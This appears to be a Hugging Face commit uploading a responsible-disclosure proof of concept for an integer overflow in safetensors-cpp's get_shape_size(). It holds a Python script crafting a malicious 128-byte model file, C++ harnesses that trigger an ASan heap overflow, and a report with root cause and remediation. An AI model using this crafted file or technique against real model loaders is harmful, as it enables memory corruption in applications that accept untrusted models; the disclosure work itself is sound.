rez0 commited on
Commit
4c19aea
·
verified ·
1 Parent(s): 76220cd

Upload folder using huggingface_hub

Browse files
Files changed (6) hide show
  1. README.md +32 -0
  2. craft_overflow.py +156 -0
  3. crash_overflow.cc +126 -0
  4. overflow_tensor.safetensors +3 -0
  5. report.md +175 -0
  6. test_overflow.cc +151 -0
README.md ADDED
@@ -0,0 +1,32 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ tags:
3
+ - safetensors
4
+ - security-research
5
+ ---
6
+
7
+ # SafeTensors C++ Integer Overflow PoC
8
+
9
+ **Security Research - Responsible Disclosure via huntr**
10
+
11
+ ## Vulnerability
12
+
13
+ safetensors-cpp `get_shape_size()` multiplies shape dimensions without overflow checking.
14
+ The Rust reference implementation uses `checked_mul` and rejects overflow.
15
+
16
+ Shape `[4194305, 4194305, 211106198978564]` overflows uint64 to 4.
17
+ Parser allocates 16 bytes, consumer iterates 4194305+ elements -> heap overflow.
18
+
19
+ ## ASan Result
20
+
21
+ ```
22
+ AddressSanitizer: heap-buffer-overflow WRITE of size 4
23
+ 0x6020000001a0 is located 0 bytes after 16-byte region
24
+ ```
25
+
26
+ ## Reproduction
27
+
28
+ ```bash
29
+ python3 craft_overflow.py
30
+ g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash crash_overflow.cc
31
+ ./crash overflow_tensor.safetensors
32
+ ```
craft_overflow.py ADDED
@@ -0,0 +1,156 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ Craft a malicious .safetensors file that exploits integer overflow in safetensors-cpp.
4
+
5
+ The safetensors format:
6
+ - 8 bytes: header_size as little-endian uint64
7
+ - header_size bytes: JSON header
8
+ - remaining bytes: tensor data
9
+
10
+ The JSON header maps tensor names to {dtype, shape, data_offsets: [start, end]}.
11
+
12
+ VULNERABILITY:
13
+ safetensors-cpp's get_shape_size() multiplies shape dimensions without overflow checking:
14
+ size_t sz = 1;
15
+ for (size_t i = 0; i < t.shape.size(); i++) {
16
+ sz *= t.shape[i]; // NO checked_mul!
17
+ }
18
+
19
+ The Rust reference implementation uses checked_mul and rejects overflow.
20
+
21
+ EXPLOIT:
22
+ Shape [4194305, 4194305, 211106198978564] has true product ~3.7e27
23
+ but overflows uint64 to exactly 4. With F32 (4 bytes/element),
24
+ tensor_size = 16 bytes. Validation passes because data_offsets = [0, 16].
25
+
26
+ A consumer that trusts the shape dimensions (e.g., to allocate a buffer for
27
+ reshaping/processing) would compute 4194305 * 4194305 * 211106198978564 * 4 bytes
28
+ = a colossal allocation, or if they also overflow, get a tiny buffer that they
29
+ then write ~3.7e27 * 4 bytes into -> heap buffer overflow.
30
+ """
31
+
32
+ import json
33
+ import struct
34
+ import sys
35
+ import os
36
+
37
+
38
+ def craft_overflow_safetensors(output_path: str):
39
+ """Create a safetensors file with integer overflow in shape dimensions."""
40
+
41
+ # These shape dimensions overflow uint64 to exactly 4 elements
42
+ # 4194305 * 4194305 * 211106198978564 ≡ 4 (mod 2^64)
43
+ # Each value fits exactly in a double (JSON number)
44
+ shape = [4194305, 4194305, 211106198978564]
45
+
46
+ # F32 = 4 bytes per element
47
+ # Overflowed tensor_size = 4 * 4 = 16 bytes
48
+ data_size = 16
49
+
50
+ # Create the tensor data (16 bytes of actual data)
51
+ tensor_data = b"\x41\x41\x41\x41" * 4 # 16 bytes of 'AAAA' pattern
52
+
53
+ header = {
54
+ "overflow_tensor": {
55
+ "dtype": "F32",
56
+ "shape": shape,
57
+ "data_offsets": [0, data_size]
58
+ }
59
+ }
60
+
61
+ # Serialize header to JSON
62
+ # Use separators to minimize whitespace (matching safetensors convention)
63
+ header_json = json.dumps(header, separators=(',', ':'))
64
+ header_bytes = header_json.encode('utf-8')
65
+
66
+ # Pad header to 8-byte alignment
67
+ pad_len = (8 - len(header_bytes) % 8) % 8
68
+ header_bytes += b' ' * pad_len
69
+
70
+ header_size = len(header_bytes)
71
+
72
+ # Build the file
73
+ file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data
74
+
75
+ with open(output_path, 'wb') as f:
76
+ f.write(file_data)
77
+
78
+ print(f"[+] Written malicious safetensors file: {output_path}")
79
+ print(f" Header size: {header_size} bytes")
80
+ print(f" Header JSON: {header_json}")
81
+ print(f" Total file size: {len(file_data)} bytes")
82
+ print(f" Shape: {shape}")
83
+ print(f" True element count: {shape[0] * shape[1] * shape[2]}")
84
+ print(f" Overflowed element count (mod 2^64): {(shape[0] * shape[1] * shape[2]) % (2**64)}")
85
+ print(f" Overflowed tensor_size (F32, 4 bytes): {((shape[0] * shape[1] * shape[2]) % (2**64)) * 4}")
86
+ print(f" Actual data size: {data_size} bytes")
87
+ print(f" Validation tensor_size == data_size: {((shape[0] * shape[1] * shape[2]) % (2**64)) * 4 == data_size}")
88
+
89
+ return output_path
90
+
91
+
92
+ def craft_normal_safetensors(output_path: str):
93
+ """Create a normal (benign) safetensors file for comparison."""
94
+ shape = [2, 2]
95
+ data_size = 16 # 4 elements * 4 bytes (F32)
96
+ tensor_data = struct.pack('<4f', 1.0, 2.0, 3.0, 4.0)
97
+
98
+ header = {
99
+ "normal_tensor": {
100
+ "dtype": "F32",
101
+ "shape": shape,
102
+ "data_offsets": [0, data_size]
103
+ }
104
+ }
105
+
106
+ header_json = json.dumps(header, separators=(',', ':'))
107
+ header_bytes = header_json.encode('utf-8')
108
+ pad_len = (8 - len(header_bytes) % 8) % 8
109
+ header_bytes += b' ' * pad_len
110
+ header_size = len(header_bytes)
111
+
112
+ file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data
113
+
114
+ with open(output_path, 'wb') as f:
115
+ f.write(file_data)
116
+
117
+ print(f"[+] Written normal safetensors file: {output_path}")
118
+ print(f" Shape: {shape}, data_size: {data_size}")
119
+
120
+
121
+ def test_with_python_safetensors(filepath: str):
122
+ """Test loading with the Python/Rust safetensors implementation."""
123
+ try:
124
+ from safetensors import safe_open
125
+ print(f"\n[*] Testing with Python safetensors (Rust backend)...")
126
+ try:
127
+ with safe_open(filepath, framework="numpy") as f:
128
+ for key in f.keys():
129
+ tensor = f.get_tensor(key)
130
+ print(f" Loaded tensor '{key}': shape={tensor.shape}, dtype={tensor.dtype}")
131
+ print(" Result: LOADED SUCCESSFULLY (unexpected for overflow file)")
132
+ except Exception as e:
133
+ print(f" Result: REJECTED - {type(e).__name__}: {e}")
134
+ except ImportError:
135
+ print("\n[!] Python safetensors not installed, skipping Rust backend test")
136
+
137
+
138
+ if __name__ == "__main__":
139
+ base_dir = os.path.dirname(os.path.abspath(__file__))
140
+
141
+ # Craft the malicious file
142
+ overflow_path = os.path.join(base_dir, "overflow_tensor.safetensors")
143
+ craft_overflow_safetensors(overflow_path)
144
+
145
+ # Craft a normal file for comparison
146
+ normal_path = os.path.join(base_dir, "normal_tensor.safetensors")
147
+ craft_normal_safetensors(normal_path)
148
+
149
+ # Test with Python/Rust implementation
150
+ print("\n" + "=" * 60)
151
+ print("DIFFERENTIAL TEST: Python/Rust safetensors")
152
+ print("=" * 60)
153
+ print("\nNormal file:")
154
+ test_with_python_safetensors(normal_path)
155
+ print("\nOverflow file:")
156
+ test_with_python_safetensors(overflow_path)
crash_overflow.cc ADDED
@@ -0,0 +1,126 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ /**
2
+ * crash_overflow.cc - Demonstrates actual heap corruption via integer overflow
3
+ *
4
+ * This simulates what a real consumer of safetensors-cpp would do:
5
+ * 1. Load a safetensors file
6
+ * 2. Get tensor shape
7
+ * 3. Allocate buffer based on shape size
8
+ * 4. Copy/iterate data using shape dimensions
9
+ *
10
+ * The malicious file has shape dimensions that overflow, so:
11
+ * - Buffer allocation uses overflowed (small) size
12
+ * - Data iteration uses shape dimensions that imply huge size
13
+ * - Result: heap buffer overflow
14
+ *
15
+ * Compile: g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash_overflow crash_overflow.cc
16
+ * Run: ./crash_overflow overflow_tensor.safetensors
17
+ */
18
+
19
+ #include <cstdio>
20
+ #include <cstdint>
21
+ #include <cstdlib>
22
+ #include <cstring>
23
+ #include <fstream>
24
+ #include <vector>
25
+
26
+ #include "safetensors.hh"
27
+
28
+ /**
29
+ * Simulated consumer function: reshape tensor data according to declared shape.
30
+ * This is what ML frameworks typically do after loading a safetensors file.
31
+ */
32
+ void process_tensor(const safetensors::tensor_t &tensor, const uint8_t *data) {
33
+ // A real consumer would use shape to determine iteration bounds
34
+ size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
35
+
36
+ // Compute total elements from shape (uses the SAME vulnerable multiplication)
37
+ size_t total_elements = safetensors::get_shape_size(tensor); // overflows to 4
38
+
39
+ // Allocate output buffer based on computed size
40
+ size_t buf_size = total_elements * dtype_bytes; // 4 * 4 = 16 bytes
41
+ printf(" Allocating buffer: %zu bytes\n", buf_size);
42
+ float *output = (float *)malloc(buf_size);
43
+
44
+ if (!output) {
45
+ printf(" malloc failed\n");
46
+ return;
47
+ }
48
+
49
+ // Copy the data - this is "safe" because both use the same overflowed size
50
+ // But the SHAPE is what matters for downstream processing
51
+ memcpy(output, data + tensor.data_offsets[0], buf_size);
52
+
53
+ printf(" Buffer allocated and filled: %zu bytes\n", buf_size);
54
+
55
+ // NOW: A consumer iterates using shape dimensions for processing
56
+ // e.g., for reshaping, transposing, or element-wise operations
57
+ // This is where the overflow becomes dangerous
58
+ printf(" Shape claims %zu x %zu x %zu = way more than %zu elements\n",
59
+ tensor.shape[0], tensor.shape[1], tensor.shape[2], total_elements);
60
+
61
+ // Demonstrate: iterate first dimension only to show OOB access
62
+ // Even just iterating shape[0] (4194305) exceeds our 4-element buffer
63
+ printf(" Iterating shape[0]=%zu elements (but buffer only has %zu)...\n",
64
+ tensor.shape[0], total_elements);
65
+
66
+ // This writes beyond the allocated buffer -> HEAP OVERFLOW
67
+ // ASan will catch this immediately
68
+ for (size_t i = 0; i < tensor.shape[0] && i < 100; i++) {
69
+ output[i] = 0.0f; // OOB write starting at index 4
70
+ }
71
+
72
+ printf(" OOB write triggered (ASan should report heap-buffer-overflow)\n");
73
+
74
+ free(output);
75
+ }
76
+
77
+ int main(int argc, char *argv[]) {
78
+ const char *filepath = "overflow_tensor.safetensors";
79
+ if (argc > 1) filepath = argv[1];
80
+
81
+ printf("=== safetensors-cpp Heap Overflow Crash PoC ===\n\n");
82
+
83
+ // Load file
84
+ std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
85
+ if (!ifs.is_open()) {
86
+ fprintf(stderr, "Failed to open %s\n", filepath);
87
+ return 1;
88
+ }
89
+ size_t filesize = ifs.tellg();
90
+ ifs.seekg(0);
91
+ std::vector<uint8_t> data(filesize);
92
+ ifs.read(reinterpret_cast<char*>(data.data()), filesize);
93
+ ifs.close();
94
+
95
+ // Parse
96
+ safetensors::safetensors_t st;
97
+ std::string warn, err;
98
+ bool ok = safetensors::load_from_memory(data.data(), data.size(), filepath, &st, &warn, &err);
99
+
100
+ if (!ok) {
101
+ printf("FAILED to load: %s\n", err.c_str());
102
+ return 1;
103
+ }
104
+
105
+ // Validate (this passes due to overflow)
106
+ std::string val_err;
107
+ if (!safetensors::validate_data_offsets(st, val_err)) {
108
+ printf("Validation failed: %s\n", val_err.c_str());
109
+ return 1;
110
+ }
111
+
112
+ printf("[+] File loaded and validated successfully\n");
113
+ printf("[*] Processing tensors...\n\n");
114
+
115
+ // Process each tensor
116
+ for (size_t i = 0; i < st.tensors.size(); i++) {
117
+ std::string key = st.tensors.keys()[i];
118
+ safetensors::tensor_t tensor;
119
+ st.tensors.at(i, &tensor);
120
+
121
+ printf("Processing tensor '%s':\n", key.c_str());
122
+ process_tensor(tensor, st.storage.data());
123
+ }
124
+
125
+ return 0;
126
+ }
overflow_tensor.safetensors ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:6691544f16c7bb866ac0f09317ac7b62581f4597b69bd8b4f88c3818983fb4b5
3
+ size 128
report.md ADDED
@@ -0,0 +1,175 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Integer Overflow in safetensors-cpp Enables Heap Buffer Overflow via Malicious Model Files
2
+
3
+ ## Summary
4
+
5
+ I found an integer overflow vulnerability in safetensors-cpp's `get_shape_size()` function that enables a heap buffer overflow when loading a crafted `.safetensors` model file. The function multiplies tensor shape dimensions using unchecked `size_t` arithmetic, allowing dimensions to overflow to a small value that passes all validation checks. The reference Rust implementation correctly uses `checked_mul` and rejects such files with `SafeTensorError::ValidationOverflow`.
6
+
7
+ A 128-byte malicious `.safetensors` file passes safetensors-cpp's `load_from_memory()` and `validate_data_offsets()` without error. Any consuming application that uses the shape dimensions for buffer allocation or iteration will experience a heap buffer overflow. This was confirmed with AddressSanitizer.
8
+
9
+ ## Attack Preconditions
10
+
11
+ 1. The target application uses safetensors-cpp to load `.safetensors` model files
12
+ 2. The application accepts model files from untrusted sources (e.g., Hugging Face Hub, user uploads, shared model repositories)
13
+ 3. The application uses tensor shape dimensions for buffer allocation, iteration, or processing (standard behavior for ML frameworks)
14
+
15
+ ## Steps to Reproduce
16
+
17
+ ### 1. Create the malicious safetensors file
18
+
19
+ ```python
20
+ # craft_overflow.py
21
+ import json, struct
22
+
23
+ shape = [4194305, 4194305, 211106198978564]
24
+ # True product: ~3.7e27, overflows uint64 to exactly 4
25
+ # With F32 (4 bytes): tensor_size = 16
26
+
27
+ header = {"overflow_tensor": {"dtype": "F32", "shape": shape, "data_offsets": [0, 16]}}
28
+ header_json = json.dumps(header, separators=(',', ':'))
29
+ header_bytes = header_json.encode('utf-8')
30
+ pad_len = (8 - len(header_bytes) % 8) % 8
31
+ header_bytes += b' ' * pad_len
32
+
33
+ with open("overflow_tensor.safetensors", "wb") as f:
34
+ f.write(struct.pack('<Q', len(header_bytes)) + header_bytes + b"\x41" * 16)
35
+ ```
36
+
37
+ ### 2. Verify the Rust reference implementation rejects it
38
+
39
+ ```python
40
+ from safetensors import safe_open
41
+ safe_open("overflow_tensor.safetensors", framework="numpy")
42
+ # Raises: SafetensorError: Error while deserializing header: ValidationOverflow
43
+ ```
44
+
45
+ ### 3. Verify safetensors-cpp accepts it
46
+
47
+ Compile the test program:
48
+ ```bash
49
+ g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -I safetensors-cpp -o test_overflow test_overflow.cc
50
+ ./test_overflow overflow_tensor.safetensors
51
+ ```
52
+
53
+ Output:
54
+ ```
55
+ [+] load_from_memory SUCCEEDED (file parsed without error)
56
+ [*] validate_data_offsets: PASSED
57
+ get_shape_size() = 4 (OVERFLOWED! True value: ~3.7e27)
58
+ tensor_size = 4 * 4 = 16
59
+ tensor_size == data_size? YES (validation passes!)
60
+ ```
61
+
62
+ ### 4. Demonstrate heap buffer overflow with ASan
63
+
64
+ ```bash
65
+ g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -g \
66
+ -I safetensors-cpp -o crash_overflow crash_overflow.cc
67
+ ./crash_overflow overflow_tensor.safetensors
68
+ ```
69
+
70
+ Output:
71
+ ```
72
+ [+] File loaded and validated successfully
73
+ Processing tensor 'overflow_tensor':
74
+ Allocating buffer: 16 bytes
75
+ Shape claims 4194305 x 4194305 x 211106198978564 = way more than 4 elements
76
+ Iterating shape[0]=4194305 elements (but buffer only has 4)...
77
+
78
+ ==33302==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001a0
79
+ WRITE of size 4 at 0x6020000001a0 thread T0
80
+ 0x6020000001a0 is located 0 bytes after 16-byte region [0x602000000190,0x6020000001a0)
81
+ SUMMARY: AddressSanitizer: heap-buffer-overflow crash_overflow.cc:69
82
+ ```
83
+
84
+ ## Root Cause Analysis
85
+
86
+ The vulnerability is in `safetensors.hh` in the `get_shape_size()` function (line ~4616):
87
+
88
+ ```cpp
89
+ size_t get_shape_size(const tensor_t &t) {
90
+ // ...
91
+ size_t sz = 1;
92
+ for (size_t i = 0; i < t.shape.size(); i++) {
93
+ sz *= t.shape[i]; // UNCHECKED MULTIPLICATION - can silently overflow
94
+ }
95
+ return sz;
96
+ }
97
+ ```
98
+
99
+ A second unchecked multiplication occurs in `validate_data_offsets()` (line ~4666):
100
+
101
+ ```cpp
102
+ size_t tensor_size = get_dtype_bytes(tensor.dtype) * get_shape_size(tensor);
103
+ ```
104
+
105
+ The reference Rust implementation uses safe arithmetic that detects overflow:
106
+
107
+ ```rust
108
+ let nelements: usize = info.shape.iter().copied()
109
+ .try_fold(1usize, usize::checked_mul)
110
+ .ok_or(SafeTensorError::ValidationOverflow)?;
111
+ ```
112
+
113
+ ### Why the overflow works
114
+
115
+ The crafted shape `[4194305, 4194305, 211106198978564]` produces:
116
+ - True product: 3,713,821,298,447,761,542,108,676,100 (~3.7 x 10^27)
117
+ - `uint64` maximum: 18,446,744,073,709,551,615 (~1.8 x 10^19)
118
+ - After overflow (mod 2^64): exactly **4**
119
+
120
+ All three values are below 2^53 (9,007,199,254,740,992), ensuring they are exactly representable as JSON double-precision numbers and survive parsing without precision loss.
121
+
122
+ With F32 dtype (4 bytes per element): `tensor_size = 4 * 4 = 16 bytes`
123
+ Setting `data_offsets = [0, 16]` makes `tensor_size == data_size`, so validation passes.
124
+
125
+ ## Remediation
126
+
127
+ Add overflow checking to `get_shape_size()`:
128
+
129
+ ```cpp
130
+ size_t get_shape_size(const tensor_t &t) {
131
+ if (t.shape.empty()) return 1;
132
+ if (t.shape.size() >= kMaxDim) return 0;
133
+
134
+ size_t sz = 1;
135
+ for (size_t i = 0; i < t.shape.size(); i++) {
136
+ if (t.shape[i] != 0 && sz > SIZE_MAX / t.shape[i]) {
137
+ return 0; // overflow would occur
138
+ }
139
+ sz *= t.shape[i];
140
+ }
141
+ return sz;
142
+ }
143
+ ```
144
+
145
+ Also add overflow checking in `validate_data_offsets()` for the `dtype_bytes * shape_size` multiplication:
146
+
147
+ ```cpp
148
+ size_t shape_size = get_shape_size(tensor);
149
+ size_t dtype_bytes = get_dtype_bytes(tensor.dtype);
150
+ if (shape_size != 0 && dtype_bytes > SIZE_MAX / shape_size) {
151
+ ss << "Tensor size overflow for '" << key << "'\n";
152
+ valid = false;
153
+ continue;
154
+ }
155
+ size_t tensor_size = dtype_bytes * shape_size;
156
+ ```
157
+
158
+ ## References
159
+
160
+ - safetensors-cpp: https://github.com/syoyo/safetensors-cpp
161
+ - Rust reference (with checked_mul): https://github.com/huggingface/safetensors/blob/main/safetensors/src/tensor.rs
162
+ - Trail of Bits audit of safetensors: https://huggingface.co/docs/safetensors/en/audit_results
163
+ - CWE-190: Integer Overflow or Wraparound: https://cwe.mitre.org/data/definitions/190.html
164
+
165
+ ## Impact
166
+
167
+ This vulnerability allows an attacker to craft a malicious `.safetensors` model file that:
168
+
169
+ 1. **Passes all validation** in safetensors-cpp (load + validate_data_offsets)
170
+ 2. **Is rejected** by the Rust reference implementation (cross-implementation differential)
171
+ 3. **Causes heap buffer overflow** in any consuming application that uses shape dimensions for memory operations
172
+
173
+ The attack surface is significant because `.safetensors` is the primary model format for Hugging Face models. Any C++ application loading models from untrusted sources (model hubs, user uploads, federated learning) is vulnerable. The malicious file is only 128 bytes and indistinguishable from a legitimate safetensors file without overflow-aware validation.
174
+
175
+ Severity: **High** (CWE-190 leading to heap overflow / potential RCE in C++ applications)
test_overflow.cc ADDED
@@ -0,0 +1,151 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ /**
2
+ * test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
3
+ *
4
+ * This program loads a malicious .safetensors file where shape dimensions
5
+ * are crafted to overflow uint64 multiplication in get_shape_size().
6
+ *
7
+ * The file passes safetensors-cpp validation because:
8
+ * shape = [4194305, 4194305, 211106198978564]
9
+ * get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
10
+ * tensor_size = 4 * sizeof(F32) = 16 bytes
11
+ * data_offsets = [0, 16] -> data_size = 16 bytes
12
+ * tensor_size == data_size -> VALIDATION PASSES
13
+ *
14
+ * But the declared shape claims ~3.7 * 10^27 elements.
15
+ *
16
+ * IMPACT: Any code that trusts the shape for buffer allocation or iteration
17
+ * will either:
18
+ * (a) Attempt a massive allocation (DoS / OOM)
19
+ * (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow)
20
+ * (c) Iterate over wrong number of elements, causing OOB reads
21
+ *
22
+ * Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc
23
+ */
24
+
25
+ #include <cstdio>
26
+ #include <cstdint>
27
+ #include <cstdlib>
28
+ #include <cstring>
29
+ #include <fstream>
30
+ #include <vector>
31
+ #include <iostream>
32
+ #include <limits>
33
+
34
+ #include "safetensors.hh"
35
+
36
+ int main(int argc, char *argv[]) {
37
+ const char *filepath = "overflow_tensor.safetensors";
38
+ if (argc > 1) {
39
+ filepath = argv[1];
40
+ }
41
+
42
+ printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");
43
+
44
+ // Read file into memory
45
+ std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
46
+ if (!ifs.is_open()) {
47
+ fprintf(stderr, "Failed to open %s\n", filepath);
48
+ return 1;
49
+ }
50
+ size_t filesize = ifs.tellg();
51
+ ifs.seekg(0);
52
+ std::vector<uint8_t> data(filesize);
53
+ ifs.read(reinterpret_cast<char*>(data.data()), filesize);
54
+ ifs.close();
55
+
56
+ printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);
57
+
58
+ // Parse with safetensors-cpp
59
+ safetensors::safetensors_t st;
60
+ std::string warn, err;
61
+
62
+ bool ok = safetensors::load_from_memory(data.data(), data.size(),
63
+ filepath, &st, &warn, &err);
64
+
65
+ if (!ok) {
66
+ printf("[!] load_from_memory FAILED: %s\n", err.c_str());
67
+ return 1;
68
+ }
69
+
70
+ if (!warn.empty()) {
71
+ printf("[!] Warnings: %s\n", warn.c_str());
72
+ }
73
+
74
+ printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");
75
+
76
+ // Validate data offsets (this is the check that should catch overflow)
77
+ std::string val_err;
78
+ bool valid = safetensors::validate_data_offsets(st, val_err);
79
+ printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
80
+ if (!valid) {
81
+ printf(" Error: %s\n", val_err.c_str());
82
+ }
83
+
84
+ // Examine the tensor
85
+ for (size_t i = 0; i < st.tensors.size(); i++) {
86
+ std::string key = st.tensors.keys()[i];
87
+ safetensors::tensor_t tensor;
88
+ st.tensors.at(i, &tensor);
89
+
90
+ printf("\n[*] Tensor: '%s'\n", key.c_str());
91
+ printf(" dtype: F32\n");
92
+ printf(" shape: [");
93
+ for (size_t j = 0; j < tensor.shape.size(); j++) {
94
+ if (j > 0) printf(", ");
95
+ printf("%zu", tensor.shape[j]);
96
+ }
97
+ printf("]\n");
98
+ printf(" data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);
99
+
100
+ // Show the overflow
101
+ size_t shape_size = safetensors::get_shape_size(tensor);
102
+ size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
103
+ size_t tensor_size = dtype_bytes * shape_size;
104
+
105
+ printf("\n [OVERFLOW ANALYSIS]\n");
106
+ printf(" get_shape_size() = %zu (OVERFLOWED! True value: ~3.7e27)\n", shape_size);
107
+ printf(" get_dtype_bytes() = %zu\n", dtype_bytes);
108
+ printf(" tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
109
+ printf(" data_size = %zu\n", tensor.data_offsets[1] - tensor.data_offsets[0]);
110
+ printf(" tensor_size == data_size? %s\n",
111
+ tensor_size == (tensor.data_offsets[1] - tensor.data_offsets[0]) ? "YES (validation passes!)" : "NO");
112
+
113
+ // Demonstrate the danger: a naive consumer trusting shape
114
+ printf("\n [IMPACT DEMONSTRATION]\n");
115
+ printf(" A consumer that trusts shape dimensions would compute:\n");
116
+ printf(" shape[0] * shape[1] * shape[2] = ");
117
+
118
+ // Use __int128 or manual check to show the true product
119
+ __uint128_t true_product = (__uint128_t)tensor.shape[0] * tensor.shape[1] * tensor.shape[2];
120
+ printf("OVERFLOW (too large for uint64)\n");
121
+ printf(" True product > UINT64_MAX: %s\n",
122
+ true_product > ((__uint128_t)UINT64_MAX) ? "YES" : "NO");
123
+
124
+ // Simulate what a consumer would do
125
+ printf("\n [SIMULATED CONSUMER BEHAVIOR]\n");
126
+
127
+ // Scenario 1: Consumer uses shape for allocation (overflows to small buffer)
128
+ size_t alloc_size = 1;
129
+ for (size_t j = 0; j < tensor.shape.size(); j++) {
130
+ alloc_size *= tensor.shape[j]; // Same overflow!
131
+ }
132
+ alloc_size *= dtype_bytes;
133
+ printf(" Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
134
+ printf(" Consumer thinks tensor has: %zu * %zu * %zu = ~3.7e27 elements\n",
135
+ tensor.shape[0], tensor.shape[1], tensor.shape[2]);
136
+
137
+ // Show it: allocate the overflowed-size buffer, then show what happens
138
+ // when iterating over shape dimensions
139
+ printf("\n If consumer allocates %zu bytes but iterates shape[0]*shape[1]*shape[2] times:\n", alloc_size);
140
+ printf(" -> HEAP BUFFER OVERFLOW (writing ~3.7e27 * 4 bytes into %zu byte buffer)\n", alloc_size);
141
+ printf(" This is a critical memory safety vulnerability.\n");
142
+ }
143
+
144
+ printf("\n=== DIFFERENTIAL RESULT ===\n");
145
+ printf(" Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
146
+ printf(" C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
147
+ printf(" Impact: A model file that Rust deems invalid is accepted by C++\n");
148
+ printf(" The shape values cause integer overflow, enabling heap corruption\n");
149
+
150
+ return 0;
151
+ }